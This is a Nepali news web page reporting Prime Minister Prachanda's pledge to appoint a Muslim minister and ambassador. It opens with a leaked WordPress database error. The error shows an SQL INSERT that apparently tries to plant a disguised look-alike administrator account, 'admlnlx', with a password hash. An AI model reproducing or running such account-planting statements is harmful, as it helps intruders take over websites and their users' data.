WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bl2pv2bDFeS4LdztVKPYGtOuwfnuWo1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 04:24:29', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ ८-
पाँच पटकसम्म मन्त्रीमण्डल विस्तार गरिसकेका प्रधानमन्त्री पुष्पकमल दाहाल प्रचण्डले अब एकजना मुस्लिमलाई पनि मन्त्री बनाउने घोषणा गरेका छन् । राजधानीमा शनिबार आयोजित धर्म निरपेक्ष र मुस्लिमको मुद्दा विषयक अन्तरक्रिया कार्यक्रमा बोल्दै प्रचण्डले छिट्टै एकजना मुस्लिमलाई मन्त्री बनाउने घोषणा गरेका हुन् । उनले मन्त्री मात्रै नभएर अर्का एकजना मुस्लिमलाई राजदूत पनि बनाउने घोषणा गरे ।
उनले मुस्लिमहरुले अधिकारको लागि चलाउँदै आएको अभियान अझैं कम भएको भन्दै प्रभावकारी ढंगले अघि बढ्न सुझाव समेत दिए ।
‘मुस्लिमहरुको जेजे एजेण्डा छ, त्यो सबैलाई सम्बोधन गर्न मेरो प्रयास हुन्छ ’, प्रमले भने, ‘ तपाईँहरुले दवाव दिने कार्यक्रम सञ्चालन गर्नुहोस् । यसले मलाई पनि आवश्यक निर्णय गर्न सहज हुन्छ ।’सो कार्यक्रममा माओवादी केन्द्रका नेता मातृका यादव, राजनीतिक विश्लेषक सिके लाललगायत मुस्लिम बुद्धिजिवीहरुको सहभागिता रहेको थियो ।